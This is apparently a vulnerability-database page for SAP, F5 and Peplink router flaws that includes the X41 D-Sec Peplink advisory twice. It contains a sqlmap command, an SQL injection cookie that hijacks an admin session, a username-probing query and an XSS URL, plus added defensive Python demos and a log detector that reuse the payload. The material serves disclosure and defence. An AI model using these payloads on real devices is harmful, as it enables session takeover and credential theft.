VARIoT IoT vulnerabilities database
| VAR-201705-4223 | No CVE | SAP NetWeaver XML External Entity Injection Vulnerability |
CVSS V2: - CVSS V3: - Severity: - |
SAP NetWeaver is prone to an XML External Entity injection vulnerability.
Attackers can exploit this issue to gain access to sensitive information or cause denial-of-service conditions.
| VAR-201705-4237 | No CVE | SAP NetWeaver Generic Object Services Unspecified Cross Site Scripting Vulnerability |
CVSS V2: - CVSS V3: - Severity: - |
SAP NetWeaver is prone to an unspecified cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
Remote attackers can exploit this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
| VAR-201705-3293 | CVE-2017-0302 | F5 BIG-IP APM Vulnerabilities related to range errors |
CVSS V2: 3.5 CVSS V3: 5.3 Severity: MEDIUM |
In F5 BIG-IP APM 12.0.0 through 12.1.2 and 13.0.0, an authenticated user with an established access session to the BIG-IP APM system may be able to cause a traffic disruption if the length of the requested URL is less than 16 characters. F5 BIG-IP APM contains a range error vulnerability that may leave the system in a denial-of-service (DoS) state. F5 BIG-IP is a load balancer that uses a variety of allocation algorithms to distribute network requests to the available servers in a server cluster; by managing incoming web traffic and increasing effective network bandwidth, it is a hardware device that gives network visitors the best possible networking experience. F5 BIG-IP APM has a remote denial-of-service vulnerability: a remote authenticated user can submit a specially crafted URL of fewer than 16 characters to put the target system into a denial-of-service condition. F5 BIG-IP Access Policy Manager (APM) is a set of access and security solutions from F5 Corporation of the United States; it provides unified access to business-critical applications and networks. A security vulnerability exists in F5 BIG-IP APM versions 12.0.0 through 12.1.2 and 13.0.0. An attacker could exploit this vulnerability to disrupt traffic.
| VAR-201705-3519 | CVE-2016-9257 | F5 BIG-IP APM Vulnerable to cross-site scripting |
CVSS V2: 4.3 CVSS V3: 6.1 Severity: MEDIUM |
In F5 BIG-IP APM 12.0.0 through 12.1.2, non-authenticated users may be able to inject JavaScript into a request that will then be rendered and executed in the context of the Administrative user when the Administrative user is viewing the Access System Logs, allowing the non-authenticated user to carry out a Cross Site Scripting (XSS) attack against the Administrative user. F5 BIG-IP APM contains a cross-site scripting vulnerability; information may be obtained and altered. F5 BIG-IP is a load balancer that uses a variety of allocation algorithms to distribute network requests to the available servers in a server cluster; by managing incoming web traffic and increasing effective network bandwidth, it is a hardware device that gives network visitors the best possible networking experience. A cross-site scripting vulnerability exists in F5 BIG-IP APM versions 12.0.0 through 12.1.2. An attacker could exploit this vulnerability to inject JavaScript into a request and carry out a cross-site scripting attack. F5 BIG-IP Access Policy Manager (APM) is a set of access and security solutions from F5 Corporation of the United States; it provides unified access to business-critical applications and networks.
| VAR-201706-0990 | CVE-2017-8838 | plural Peplink Balance Device product firmware cross-site scripting vulnerability |
CVSS V2: 4.3 CVSS V3: 6.1 Severity: MEDIUM |
XSS via syncid exists on Peplink Balance 305, 380, 580, 710, 1350, and 2500 devices with firmware before fw-b305hw2_380hw6_580hw2_710hw3_1350hw2_2500-7.0.1-build2093. The affected script is cgi-bin/HASync/hasync.cgi. The firmware of multiple Peplink Balance devices contains a cross-site scripting vulnerability in cgi-bin/HASync/hasync.cgi; information may be obtained and altered. Peplink Balance 305 is a multi-WAN load balancing router for medium-sized enterprises. A remote attacker can exploit this vulnerability to inject arbitrary web script or HTML via the 'syncid' parameter. The following products are affected: Peplink Balance 305, 380, 580, 710, 1350 and 2500.
X41 D-Sec GmbH Security Advisory: X41-2017-005
Multiple Vulnerabilities in Peplink Balance Routers
===================================================
Overview
--------
Confirmed Affected Versions: 7.0.0-build1904
Confirmed Patched Versions:
fw-b305hw2_380hw6_580hw2_710hw3_1350hw2_2500-7.0.1-build2093.bin
Vulnerable Firmware:
fw-b305hw2_380hw6_580hw2_710hw3_1350hw2_2500-7.0.0-build1904.bin
Models: Balance Routers 305, 380, 580, 710, 1350, 2500
Vendor: Peplink
Vendor URL: https://www.peplink.com/
Vector: Network
Credit: X41 D-Sec GmbH, Eric Sesterhenn
Additional Credits: Claus Overbeck (Abovo IT)
Status: Public
Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2017-005-peplink/
Summary and Impact
------------------
Several issues have been identified, which allow attackers to access the
administrative web interface with admin credentials, delete files,
perform CSRF and XSS attacks.
Product Description
-------------------
From the vendor webpage:
Use Load Balancing and SpeedFusion bandwidth bonding to deliver
superfast VoIP, video streaming, and data using an SD-WAN enabled
network. Even with a basic Balance 20 dual-WAN router, you can mix
different transport technologies and providers to keep your network up
when individual links go down. Switching between links is automatic and
seamless.
SQL Injection via bauth Cookie
==============================
Severity Rating: Critical
Vector: Network
CVE: CVE-2017-8835
CWE: 89
CVSS Score: 9.8
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Summary and Impact
------------------
Peplink devices are vulnerable to an SQL injection attack via the bauth
cookie parameter which is set e.g. when accessing
https://ip/cgi-bin/MANGA/admin.cgi.
The injection can be checked with the following command:
./sqlmap.py -u "https://ip/cgi-bin/MANGA/admin.cgi"
--cookie="bauth=csOWLxU4BvoMfhY2rHLVFm1EmZWV74zinla9IVclqrYxH16426647"
-p"bauth" --level 5 --risk 3 --dbms sqlite --technique=BEUSQ
--flush-session -t trace.log --prefix "'" --suffix "--" -a
The vulnerability in the Peplink device allows access to the SQLite
session database containing user and session variables. By using the
following cookie in a web request, it is possible to select a running
administrator session to be used for the attacker's login.
bauth=-12' or id IN (select s.id from sessions as s left join
sessionsvariables as v on v.id=s.id where v.name='rwa' and v.value='1')
or '1'='2
By forming specialised SQL queries, it is possible to retrieve usernames
from the database. This worked by returning a valid session if the
username existed and no session if it did not. In the first case
the server did not set a new session cookie in the response to the request.
SELECT id FROM sessions WHERE sessionid = '-14' or id IN (select s.id
from sessions as s left join sessionsvariables as v on v.id=s.id where
v.name='username' and substr(v.value,1,3)='adm')
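The queries above show the shape of the lookup: the bauth cookie is spliced into the SQL text, so a value containing a quote rewrites the WHERE clause. The following added example (not code from the X41 advisory or from the Peplink firmware) models that lookup against a constructed in-memory SQLite session store and puts the parameterized form beside it. Only the table and column names the advisory's queries reveal (sessions, sessionsvariables, sessionid, name, value, rwa) are taken from the page; the schema details, rows and token strings are assumptions made for the demo.

```python
"""Demo of the bauth session lookup: string-spliced SQL beside a parameterized
query. Added example, not code from the X41 advisory or the Peplink firmware;
the schema, rows and tokens are constructed and only reuse the table/column
names the advisory's quoted queries reveal."""
import sqlite3

# Cookie value quoted in the advisory, treated here purely as input data.
ADVISORY_PAYLOAD = (
    "-12' or id IN (select s.id from sessions as s left join "
    "sessionsvariables as v on v.id=s.id where v.name='rwa' and v.value='1') "
    "or '1'='2"
)

# Constructed session tokens (the advisory's real cookie value is not reused).
ADMIN_TOKEN = "admin-token-constructed"
GUEST_TOKEN = "guest-token-constructed"


def build_db() -> sqlite3.Connection:
    """Constructed in-memory session store: id 1 is a read/write admin session
    (rwa=1), id 2 is a read-only session (rwa=0)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE sessions (id INTEGER PRIMARY KEY, sessionid TEXT NOT NULL);
        CREATE TABLE sessionsvariables (id INTEGER, name TEXT, value TEXT);
        """
    )
    conn.executemany("INSERT INTO sessions VALUES (?, ?)",
                     [(1, ADMIN_TOKEN), (2, GUEST_TOKEN)])
    conn.executemany("INSERT INTO sessionsvariables VALUES (?, ?, ?)",
                     [(1, "username", "admin"), (1, "rwa", "1"),
                      (2, "username", "guest"), (2, "rwa", "0")])
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, bauth: str) -> list:
    """Lookup shaped like the query the advisory quotes: the cookie value is
    concatenated into the SQL text, so quotes in it change the statement."""
    sql = "SELECT id FROM sessions WHERE sessionid = '" + bauth + "'"
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn: sqlite3.Connection, bauth: str) -> list:
    """Hardened lookup: the cookie is bound as a parameter, so it is compared
    as a plain string and cannot alter the statement."""
    sql = "SELECT id FROM sessions WHERE sessionid = ?"
    return [row[0] for row in conn.execute(sql, (bauth,))]


def compare(bauth: str) -> dict:
    """Run both lookups against a fresh store and report which session ids
    each one returns for the same cookie value."""
    conn = build_db()
    try:
        return {"vulnerable": lookup_vulnerable(conn, bauth),
                "safe": lookup_safe(conn, bauth)}
    finally:
        conn.close()


if __name__ == "__main__":
    for cookie in (GUEST_TOKEN, ADVISORY_PAYLOAD):
        print(repr(cookie[:40]), "->", compare(cookie))
```

With the genuine guest token both lookups return session 2. With the advisory's cookie value the spliced query returns session 1, the admin session, because the injected subquery selects every session whose rwa variable is "1"; the parameterized query returns nothing, since the whole value is compared as a string that matches no stored sessionid. Binding the parameter is the fix; validating the cookie against the character set the device itself issues is a useful second layer.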
Workarounds
-----------
Install vendor supplied update.
No CSRF Protection
==================
Severity Rating: Medium
Vector: Network
CVE: CVE-2017-8836
CWE: 352
CVSS Score: 5.4
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
Summary and Impact
------------------
The CGI scripts in the administrative interface are not protected
against cross-site request forgery attacks. This allows an attacker to
execute commands if a logged-in user visits a malicious website. This
can for example be used to change the credentials of the administrative
web interface.
Workarounds
-----------
Install vendor supplied update.
Passwords stored in Cleartext
=============================
Severity Rating: Medium
Vector: Network
CVE: CVE-2017-8837
CWE: 256
CVSS Score: 4.0
CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Summary and Impact
------------------
The Peplink devices store passwords in cleartext in the files
/etc/waipass and /etc/roapass. In case one of these devices is
compromised the attacker can gain access to the cleartext passwords and
abuse them to compromise further systems.
Workarounds
-----------
Install vendor supplied update.
XSS via syncid Parameter
========================
Severity Rating: Medium
Vector: Network
CVE: CVE-2017-8838
CWE: 80
CVSS Score: 5.4
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
Summary and Impact
------------------
If the web interface is accessible, it is possible to abuse the syncid
parameter to trigger a cross-site scripting issue by calling
https://ip/cgi-bin/HASync/hasync.cgi?debug=1&syncid=123%3Cscript%3Ealert%281%29%3C/script%3E
This executes the JavaScript in the victim's browser, which can be abused
to steal session cookies.
Workarounds
-----------
Install vendor supplied update.
XSS via preview.cgi
===================
Severity Rating: Medium
Vector: Network
CVE: CVE-2017-8839
CWE: 80
CVSS Score: 5.4
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
Summary and Impact
------------------
If the web interface is accessible, it is possible to abuse the
orig_url parameter to trigger a cross-site scripting issue in
/guest/preview.cgi. The injection is directly into existing JavaScript.
This executes the JavaScript in the victim's browser, which can be abused
to steal session cookies.
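The two XSS issues above differ in output context: syncid is reflected into an HTML body line, while orig_url lands inside existing JavaScript, where HTML entity encoding is the wrong tool. The following added example (not code from the X41 advisory or the Peplink firmware) shows an encoder for each context; the rendered fragments are constructed stand-ins for what hasync.cgi and preview.cgi emit, and the variable name origUrl is an assumption.

```python
"""Context-aware output encoding for the two reflected values named in the
advisory. Added example, not code from the X41 advisory or Peplink's firmware;
the page fragments are constructed stand-ins for what hasync.cgi and
preview.cgi render."""
import html
import json


def render_syncid_line(syncid: str) -> str:
    """HTML-body context (the 'Submitted syncid = [ ... ]' line): entity-encode
    the value so '<' and '>' cannot open a tag."""
    return "Submitted syncid = [ " + html.escape(syncid, quote=True) + " ]"


def js_string_literal(value: str) -> str:
    """Encode a value as a JavaScript string literal. json.dumps escapes quotes,
    backslashes, control characters and U+2028/U+2029; '<' and '>' are then
    emitted as \\u escapes so the literal can never contain '</script>' or an
    HTML comment opener, whatever the input was."""
    return (json.dumps(value)
            .replace("<", "\\u003c")
            .replace(">", "\\u003e"))


def render_preview_script(orig_url: str) -> str:
    """Script context (the orig_url value preview.cgi places inside existing
    JavaScript): the value is emitted only as a JS string literal."""
    return "<script>var origUrl = " + js_string_literal(orig_url) + ";</script>"


def script_block_is_intact(rendered: str) -> bool:
    """Check that a rendered script block still has exactly one opening and
    one closing script tag, i.e. the embedded value could not close it early."""
    return rendered.count("<script>") == 1 and rendered.count("</script>") == 1


if __name__ == "__main__":
    print(render_syncid_line("123<script>alert(1)</script>"))
    print(render_preview_script("</script><script>alert(1)</script>"))
```

The point of js_string_literal is that the browser's HTML parser finds the end of a script block before the JavaScript parser ever runs, so a value that merely has its quotes escaped can still terminate the block with a literal </script>; encoding the angle brackets as \u003c/\u003e removes that path while leaving the decoded JavaScript string unchanged.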
Workarounds
-----------
Install vendor supplied update.
File Deletion
=============
Severity Rating: Medium
Vector: Network
CVE: CVE-2017-8841
CWE: 73
CVSS Score: 6.5
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H
Summary and Impact
------------------
A logged-in user can delete arbitrary files on the Peplink devices by
abusing /cgi-bin/MANGA/firmware_process.cgi. When an absolute path
is provided in the upfile.path parameter, the file at that path
is deleted during the process. This can be abused to cause a denial of
service (DoS). In combination with the missing CSRF protection, this can
be abused remotely via a logged-in user.
Workarounds
-----------
Install vendor supplied update.
Information Disclosure
======================
Severity Rating: Medium
Vector: Network
CVE: CVE-2017-8840
CWE: 200
CVSS Score: 5.3
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Summary and Impact
------------------
If the webinterface is accessible, it is possible to retrieve sensitive
information without a valid login by opening
cgi-bin/HASync/hasync.cgi?debug=1
This displays the following:
-----8<------------------------------------------------
Master LAN Address = [ <internal ip> / <netmask> ]
Serial Number = [ <serial number> ]
HA Group ID = [ <group id> ]
Virtual IP = [ <internal ip> / <netmask> ]
Submitted syncid = [ <syncid> ]
-----8<------------------------------------------------
This information can be valuable for an attacker to exploit other issues.
Workarounds
-----------
Install vendor supplied update.
About X41 D-Sec GmbH
--------------------
X41 D-Sec is a provider of application security services. We focus on
application code reviews, design review and security testing. X41 D-Sec
GmbH was founded in 2015 by Markus Vervier. We support customers in
various industries such as finance, software development and public
institutions.
Timeline
--------
2017-04-07 Issue found
2017-04-10 Vendor asked for security contact
2017-04-11 Vendor replied, sent GPG key
2017-04-11 Information supplied to vendor
2017-04-11 Vendor acknowledges that the information is received
2017-04-17 Vendor acknowledges SQL injection
2017-05-08 CVE IDs for all issues requested
2017-05-08 CVE IDs assigned
2017-05-11 Vendor informed about CVE IDs
2017-05-29 Version provided to X41 for testing
2017-05-31 First test results sent back to the vendor
2017-06-01 Remaining test results sent back to the vendor
2017-06-05 Coordinated Firmware and Advisory release
--
X41 D-SEC GmbH, Dennewartstr. 25-27, D-52068 Aachen
T: +49 241 9809418-0, Fax: -9
Unternehmenssitz: Aachen, Amtsgericht Aachen: HRB19989
Geschäftsführer: Markus Vervier
| VAR-201706-0991 | CVE-2017-8839 | plural Peplink Balance Device product firmware cross-site scripting vulnerability |
CVSS V2: 4.3 CVSS V3: 6.1 Severity: MEDIUM |
XSS via orig_url exists on Peplink Balance 305, 380, 580, 710, 1350, and 2500 devices with firmware before fw-b305hw2_380hw6_580hw2_710hw3_1350hw2_2500-7.0.1-build2093. The affected script is guest/preview.cgi. The firmware of multiple Peplink Balance devices contains a cross-site scripting vulnerability in guest/preview.cgi; information may be obtained and altered. Peplink Balance 305 is a multi-WAN load balancing router for medium-sized enterprises. A remote attacker can exploit this vulnerability to inject arbitrary web script or HTML via the 'orig_url' parameter. The following products are affected: Peplink Balance 305, 380, 580, 710, 1350 and 2500.
| VAR-201706-0992 | CVE-2017-8840 | plural Peplink Balance Information disclosure vulnerability in device product firmware |
CVSS V2: 5.0 CVSS V3: 5.3 Severity: MEDIUM |
Debug information disclosure exists on Peplink Balance 305, 380, 580, 710, 1350, and 2500 devices with firmware before fw-b305hw2_380hw6_580hw2_710hw3_1350hw2_2500-7.0.1-build2093. A direct request to cgi-bin/HASync/hasync.cgi?debug=1 shows Master LAN Address, Serial Number, HA Group ID, Virtual IP, and Submitted syncid. Peplink Balance 305 is a multi-WAN load balancing router for medium-sized enterprises. The following products are affected: Peplink Balance 305, 380, 580, 710, 1350 and 2500.
| VAR-201706-0978 | CVE-2017-8841 | plural Peplink Balance Path traversal vulnerability in device product firmware |
CVSS V2: 7.5 CVSS V3: 8.1 Severity: HIGH |
Arbitrary file deletion exists on Peplink Balance 305, 380, 580, 710, 1350, and 2500 devices with firmware before fw-b305hw2_380hw6_580hw2_710hw3_1350hw2_2500-7.0.1-build2093. The attack methodology is absolute path traversal in cgi-bin/MANGA/firmware_process.cgi via the upfile.path parameter. The firmware of multiple Peplink Balance devices contains a path traversal vulnerability; information may be tampered with and service operation disrupted (DoS). Peplink Balance 305 is a multi-WAN load balancing router for medium-sized enterprises. An attacker could exploit this vulnerability by abusing the /cgi-bin/MANGA/firmware_process.cgi file to remove arbitrary files. The following products are affected: Peplink Balance 305, 380, 580, 710, 1350 and 2500.
X41 D-Sec GmbH Security Advisory: X41-2017-005
Multiple Vulnerabilities in peplink balance routers
===================================================
Overview
--------
Confirmed Affected Versions: 7.0.0-build1904
Confirmed Patched Versions:
fw-b305hw2_380hw6_580hw2_710hw3_1350hw2_2500-7.0.1-build2093.bin
Vulnerable Firmware:
fw-b305hw2_380hw6_580hw2_710hw3_1350hw2_2500-7.0.0-build1904.bin
Models: Balance Routers 305, 380, 580, 710, 1350, 2500
Vendor: Peplink
Vendor URL: https://www.peplink.com/
Vector: Network
Credit: X41 D-Sec GmbH, Eric Sesterhenn
Additional Credits: Claus Overbeck (Abovo IT)
Status: Public
Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2017-005-peplink/
Summary and Impact
------------------
Several issues have been identified, which allow attackers to access the
administrative web interface with admin credentials, delete files,
perform CSRF and XSS attacks.
Product Description
-------------------
From the vendor webpage:
Use Load Balancing and SpeedFusion bandwidth bonding to deliver
superfast VoIP, video streaming, and data using an SD-WAN enabled
network. Even with a basic Balance 20 dual-WAN router, you can mix
different transport technologies and providers to keep your network up
when individual links go down. Switching between links is automatic and
seamless.
SQL Injection via bauth Cookie
==============================
Severity Rating: Critical
Vector: Network
CVE: CVE-2017-8835
CWE: 89
CVSS Score: 9.8
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Summary and Impact
------------------
Peplink devices are vulnerable to an SQL injection attack via the bauth
cookie parameter which is set e.g. when accessing
https://ip/cgi-bin/MANGA/admin.cgi.
The injection can be checked with the following command:
./sqlmap.py -u "https://ip/cgi-bin/MANGA/admin.cgi"
--cookie="bauth=csOWLxU4BvoMfhY2rHLVFm1EmZWV74zinla9IVclqrYxH16426647"
-p"bauth" --level 5 --risk 3 --dbms sqlite --technique=BEUSQ
--flush-session -t trace.log --prefix "'" --suffix "--" -a
The vulnerability in the Peplink device allows access to the SQLite
session database containing user and session variables. By using the
following cookie in a web request, it is possible to select a running
administrator session to be used for the attacker's login.
bauth=-12' or id IN (select s.id from sessions as s left join
sessionsvariables as v on v.id=s.id where v.name='rwa' and v.value='1')
or '1'='2
By forming specialised SQL queries, it is possible to retrieve usernames
from the database. The query below returns a valid session if a username
matching the condition exists and no session if it does not; in the first
case the server does not set a new session cookie in the response, which
makes the two outcomes distinguishable to the requester.
SELECT id FROM sessions WHERE sessionid = '-14' or id IN (select s.id
from sessions as s left join sessionsvariables as v on v.id=s.id where
v.name='username' and substr(v.value,1,3)='adm')
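To make the defect concrete from the defender's side, the following added example (not Peplink's code and not part of the original advisory) rebuilds a hypothetical session store with the sessions/sessionsvariables layout the advisory describes, shows that concatenating the bauth cookie into the query returns the running admin session for the advisory's injected cookie value, and contrasts it with a hardened lookup that validates the token format and binds it as a parameter. The table columns, sample rows and token format are assumptions.

```python
import re
import sqlite3

# Constructed, hypothetical reconstruction of the session store named in the
# advisory (a "sessions" table joined to "sessionsvariables"); not Peplink's schema.
SCHEMA = """
CREATE TABLE sessions (
    id        INTEGER PRIMARY KEY,
    sessionid TEXT NOT NULL
);
CREATE TABLE sessionsvariables (
    id    INTEGER NOT NULL,
    name  TEXT NOT NULL,
    value TEXT NOT NULL
);
"""

# Constructed sample data: one read-only session and one read-write-admin
# session; 'rwa'='1' is the marker the advisory's payload selects on.
SAMPLE_SESSIONS = [
    (1, "guestToken00000000001111", {"username": "guest", "rwa": "0"}),
    (2, "adminToken00000000002222", {"username": "admin", "rwa": "1"}),
]

# The injected cookie value quoted in the advisory.
INJECTED_COOKIE = (
    "-12' or id IN (select s.id from sessions as s left join "
    "sessionsvariables as v on v.id=s.id where v.name='rwa' and v.value='1') "
    "or '1'='2"
)

# Assumption: a legitimate bauth token is a plain alphanumeric string, as the
# example cookie in the advisory is.
BAUTH_TOKEN_RE = re.compile(r"[A-Za-z0-9]{16,128}")


def open_session_db() -> sqlite3.Connection:
    """Create an in-memory session database filled with the sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    for sid, token, variables in SAMPLE_SESSIONS:
        conn.execute("INSERT INTO sessions (id, sessionid) VALUES (?, ?)", (sid, token))
        for name, value in variables.items():
            conn.execute(
                "INSERT INTO sessionsvariables (id, name, value) VALUES (?, ?, ?)",
                (sid, name, value),
            )
    conn.commit()
    return conn


def lookup_session_vulnerable(conn: sqlite3.Connection, bauth: str):
    """The defect: the cookie is pasted into the SQL text, so a value containing
    a quote terminates the string literal and appends its own conditions."""
    sql = "SELECT id FROM sessions WHERE sessionid = '" + bauth + "'"
    row = conn.execute(sql).fetchone()
    return None if row is None else row[0]


def lookup_session_safe(conn: sqlite3.Connection, bauth: str):
    """Hardened lookup: reject anything that is not a well-formed token, then
    bind the value as a parameter so SQLite never interprets it as SQL."""
    if not BAUTH_TOKEN_RE.fullmatch(bauth):
        return None
    row = conn.execute(
        "SELECT id FROM sessions WHERE sessionid = ?", (bauth,)
    ).fetchone()
    return None if row is None else row[0]


def is_admin_session(conn: sqlite3.Connection, session_id: int) -> bool:
    """True if the session carries the read-write-admin variable."""
    row = conn.execute(
        "SELECT value FROM sessionsvariables WHERE id = ? AND name = 'rwa'",
        (session_id,),
    ).fetchone()
    return row is not None and row[0] == "1"


if __name__ == "__main__":
    db = open_session_db()
    hijacked = lookup_session_vulnerable(db, INJECTED_COOKIE)
    print("vulnerable lookup with injected cookie ->", hijacked,
          "(admin)" if hijacked is not None and is_admin_session(db, hijacked) else "")
    print("hardened lookup with injected cookie   ->", lookup_session_safe(db, INJECTED_COOKIE))
```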
Workarounds
-----------
Install vendor supplied update.
No CSRF Protection
==================
Severity Rating: Medium
Vector: Network
CVE: CVE-2017-8836
CWE: 352
CVSS Score: 5.4
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
Summary and Impact
------------------
The CGI scripts in the administrative interface are not protected
against cross-site request forgery attacks. This allows an attacker to
execute commands if a logged-in user visits a malicious website. This
can, for example, be used to change the credentials of the administrative
web interface.
Workarounds
-----------
Install vendor supplied update.
Passwords stored in Cleartext
=============================
Severity Rating: Medium
Vector: Network
CVE: CVE-2017-8837
CWE: 256
CVSS Score: 4.0
CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Summary and Impact
------------------
The Peplink devices store passwords in cleartext in the files
/etc/waipass and /etc/roapass. If one of these devices is compromised,
the attacker can read the cleartext passwords and abuse them to
compromise further systems.
Workarounds
-----------
Install vendor supplied update.
XSS via syncid Parameter
========================
Severity Rating: Medium
Vector: Network
CVE: CVE-2017-8838
CWE: 80
CVSS Score: 5.4
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
Summary and Impact
------------------
If the web interface is accessible, it is possible to abuse the syncid
parameter to trigger a cross-site scripting issue by calling
https://ip/cgi-bin/HASync/hasync.cgi?debug=1&syncid=123%3Cscript%3Ealert%281%29%3C/script%3E
This executes the JavaScript in the victim's browser, which can be abused
to steal session cookies.
Workarounds
-----------
Install vendor supplied update.
XSS via preview.cgi
===================
Severity Rating: Medium
Vector: Network
CVE: CVE-2017-8839
CWE: 80
CVSS Score: 5.4
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
Summary and Impact
------------------
If the web interface is accessible, it is possible to abuse the
orig_url parameter to trigger a cross-site scripting issue in
/guest/preview.cgi. The injection lands directly inside existing JavaScript.
This executes the JavaScript in the victim's browser, which can be abused
to steal session cookies.
Workarounds
-----------
Install vendor supplied update.
File Deletion
=============
Severity Rating: Medium
Vector: Network
CVE: CVE-2017-8841
CWE: 73
CVSS Score: 6.5
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H
Summary and Impact
------------------
A logged-in user can delete arbitrary files on the Peplink devices by
abusing /cgi-bin/MANGA/firmware_process.cgi: when an absolute path is
supplied in the upfile.path parameter, the file at that path is deleted
during processing. This can be abused to cause a denial of service (DoS).
In combination with the missing CSRF protection, this can also be
triggered remotely through a logged-in user.
Workarounds
-----------
Install vendor supplied update.
Information Disclosure
======================
Severity Rating: Medium
Vector: Network
CVE: CVE-2017-8840
CWE: 200
CVSS Score: 5.3
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Summary and Impact
------------------
If the web interface is accessible, it is possible to retrieve sensitive
information without a valid login by opening
cgi-bin/HASync/hasync.cgi?debug=1
This displays the following:
-----8<------------------------------------------------
Master LAN Address = [ <internal ip> / <netmask> ]
Serial Number = [ <serial number> ]
HA Group ID = [ <group id> ]
Virtual IP = [ <internal ip> / <netmask> ]
Submitted syncid = [ <syncid> ]
-----8<------------------------------------------------
This information can be valuable for an attacker to exploit other issues.
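Both hasync.cgi issues above (the syncid XSS and the unauthenticated debug output) and the preview.cgi XSS leave traces in ordinary web server access logs. The following added example (not part of the original advisory and not Peplink's code) runs three detection rules over constructed Common Log Format lines; the log lines, the rule names and the parsing assumptions are mine, and because an access log does not record whether a request was authenticated, the debug rule flags every debug=1 request to hasync.cgi.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (Common Log Format); not real device logs.
SAMPLE_LOG = """\
203.0.113.5 - - [05/Jun/2017:10:00:01 +0200] "GET /cgi-bin/MANGA/admin.cgi HTTP/1.1" 200 5120
203.0.113.7 - - [05/Jun/2017:10:00:12 +0200] "GET /cgi-bin/HASync/hasync.cgi?debug=1 HTTP/1.1" 200 412
203.0.113.7 - - [05/Jun/2017:10:00:15 +0200] "GET /cgi-bin/HASync/hasync.cgi?debug=1&syncid=123%3Cscript%3Ealert%281%29%3C/script%3E HTTP/1.1" 200 470
203.0.113.9 - - [05/Jun/2017:10:01:03 +0200] "GET /guest/preview.cgi?orig_url=%22%3B%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 1300
192.0.2.10 - - [05/Jun/2017:10:02:00 +0200] "GET /cgi-bin/HASync/hasync.cgi?syncid=42 HTTP/1.1" 200 120
"""

# Minimal Common Log Format parser (client, identd, user, timestamp, request, status, size).
CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Markup that has no business in syncid or orig_url (checked after URL decoding).
MARKUP_RE = re.compile(r"[<>]|javascript:", re.IGNORECASE)


def parse_clf(line: str):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = CLF_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    return {
        "ip": m.group("ip"),
        "ts": m.group("ts"),
        "method": m.group("method"),
        "path": parts.path,
        # parse_qs percent-decodes values, so encoded <script> becomes visible.
        "params": parse_qs(parts.query, keep_blank_values=True),
        "status": int(m.group("status")),
    }


def first_param(params: dict, name: str) -> str:
    """First value of a query parameter, or '' when absent."""
    return params.get(name, [""])[0]


def classify(entry: dict) -> list:
    """Return the names of the rules (assumed names) that the request matches."""
    rules = []
    path, params = entry["path"], entry["params"]
    if path.endswith("/cgi-bin/HASync/hasync.cgi"):
        if first_param(params, "debug") == "1":
            rules.append("hasync-debug-disclosure")   # CVE-2017-8840 probe
        if MARKUP_RE.search(first_param(params, "syncid")):
            rules.append("hasync-syncid-xss")         # CVE-2017-8838 payload
    if path.endswith("/guest/preview.cgi") and MARKUP_RE.search(first_param(params, "orig_url")):
        rules.append("preview-orig_url-xss")          # CVE-2017-8839 payload
    return rules


def scan(log_text: str) -> list:
    """Run the rules over every line and keep only the requests that matched."""
    findings = []
    for line in log_text.splitlines():
        entry = parse_clf(line)
        if entry is None:
            continue
        rules = classify(entry)
        if rules:
            findings.append({"ip": entry["ip"], "ts": entry["ts"],
                             "path": entry["path"], "rules": rules})
    return findings


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["ts"], hit["ip"], hit["path"], ", ".join(hit["rules"]))
```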
Workarounds
-----------
Install vendor supplied update.
About X41 D-Sec GmbH
--------------------
X41 D-Sec is a provider of application security services. We focus on
application code reviews, design review and security testing. X41 D-Sec
GmbH was founded in 2015 by Markus Vervier. We support customers in
various industries such as finance, software development and public
institutions.
Timeline
--------
2017-04-07 Issue found
2017-04-10 Vendor asked for security contact
2017-04-11 Vendor replied, sent GPG key
2017-04-11 Information supplied to vendor
2017-04-11 Vendor acknowledges that the information is received
2017-04-17 Vendor acknowledges SQL injection
2017-05-08 CVE IDs for all issues requested
2017-05-08 CVE IDs assigned
2017-05-11 Vendor informed about CVE IDs
2017-05-29 Version provided to X41 for testing
2017-05-31 First test results sent back to the vendor
2017-06-01 Remaining test results sent back to the vendor
2017-06-05 Coordinated Firmware and Advisory release
--
